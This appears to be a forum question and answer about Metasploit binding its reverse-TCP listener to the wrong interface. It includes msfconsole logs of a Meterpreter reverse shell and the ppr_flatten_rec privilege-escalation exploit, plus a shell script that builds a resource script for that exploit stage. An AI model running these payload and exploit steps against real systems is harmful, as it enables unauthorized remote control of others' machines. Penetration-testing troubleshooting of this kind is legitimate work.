When I use Metasploit on Kali Linux rolling release, and I use exploit/multi/handler with windows/meterpreter/reverse_tcp, the LHOST field gets automatically changed to the Wi-Fi interface IP, when what I actually want to use is tap0, which is the VPN interface.
I have tried the following to solve the problem:
set LHOST <tap0 IP>
setg LHOST <tap0 IP>
set INTERFACE tap0
setg INTERFACE tap0
set interface tap0
set interface tap0
But when I use the run command, the victim tries to connect to my Wi-Fi, which is obviously not reachable from the VPN.
I have had this problem for at least 6 months, no matter when I update Kali or Metasploit. If anyone knows the correct way to configure Metasploit, I would appreciate it.
Example of the problem:
msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run
[*] Started reverse TCP handler on 192.168.85.158:4444
The full context is:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.1:443
[*] Sending stage (179779 bytes) to 192.168.22.55
[*] Meterpreter session 1 opened (192.168.0.1:443 -> 192.168.22.55:49202) at 2018-01-10 23:27:30 -0500
meterpreter >
Background session 1? [y/N]
msf exploit(multi/handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST **192.168.0.1**
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run
[*] Started reverse TCP handler on **192.168.85.158**:4444
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.85.158 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Posted on 2018-01-11 21:46:37
The solution to my problem was explained in Mukesh's comment (and many thanks to Schroeder for taking the time to help me structure this question better). The solution is to use set PAYLOAD again before each local exploit you want to use.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] Sending stage (847604 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.158:57772) at 2018-01-11 16:30:40 -0500
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > set PAYLOAD windows/meterpreter/reverse_tcp <------- [previously this was missing]
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ppr_flatten_rec) > set LPORT 4445
LPORT => 4445
msf exploit(ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.1 yes The listen address
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.1:4445 <----- [Now the IP is the correct one]
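As an added example (not code from the original question or answer, and not part of Metasploit), here is a small POSIX shell helper that picks the VPN interface address out of `ip -4 -o addr show` text and emits a msfconsole resource script in the order the answer describes: `set PAYLOAD` on the local module first, then LHOST. The interface names, sample addresses, port and session number are assumptions constructed to mirror the question.

```shell
#!/bin/sh
# Added example, not code from the original post or from Metasploit itself.
# It reads the tap0 address out of `ip -4 -o addr show` text and emits a
# msfconsole resource script that sets PAYLOAD *before* LHOST on the local
# exploit module, which is the ordering the accepted fix relies on.

# Constructed sample of `ip -4 -o addr show` output (interface names and
# addresses are assumptions mirroring the question: Wi-Fi vs. VPN tap0).
SAMPLE_IP_OUTPUT='1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever
2: wlan0    inet 192.168.85.158/24 brd 192.168.85.255 scope global dynamic wlan0\       valid_lft 3000sec preferred_lft 3000sec
3: tap0    inet 192.168.0.1/24 brd 192.168.0.255 scope global tap0\       valid_lft forever preferred_lft forever'

# iface_ip NAME TEXT: print the first IPv4 address of interface NAME found
# in TEXT (ip -o format: "<idx>: <name> inet <addr>/<prefix> ...").
iface_ip() {
    printf '%s\n' "$2" |
        awk -v ifc="$1" '$2 == ifc && $3 == "inet" { sub(/\/.*/, "", $4); print $4; exit }'
}

# build_rc LHOST LPORT SESSION: emit the resource script for the local
# exploit stage. PAYLOAD comes first, then LHOST/LPORT, then SESSION, which
# is the sequence that produced the correct listener address in the answer.
build_rc() {
    cat <<EOF
use exploit/windows/local/ppr_flatten_rec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set SESSION $3
show options
EOF
}

# rc_payload_before_lhost: read a resource script on stdin and succeed only
# if every `set LHOST` is preceded by a `set PAYLOAD` in the same `use` block.
rc_payload_before_lhost() {
    awk '
        /^use /         { have_payload = 0 }
        /^set PAYLOAD / { have_payload = 1 }
        /^set LHOST /   { if (!have_payload) bad = 1 }
        END             { exit bad }'
}

# Stand-alone demo: on a real host replace SAMPLE_IP_OUTPUT with
# "$(ip -4 -o addr show)", save the output as local.rc and load it
# with `msfconsole -r local.rc` once the handler has a session.
build_rc "$(iface_ip tap0 "$SAMPLE_IP_OUTPUT")" 4445 1
```

The `rc_payload_before_lhost` check is a cheap way to lint any saved resource script so the ordering mistake from the question cannot creep back in.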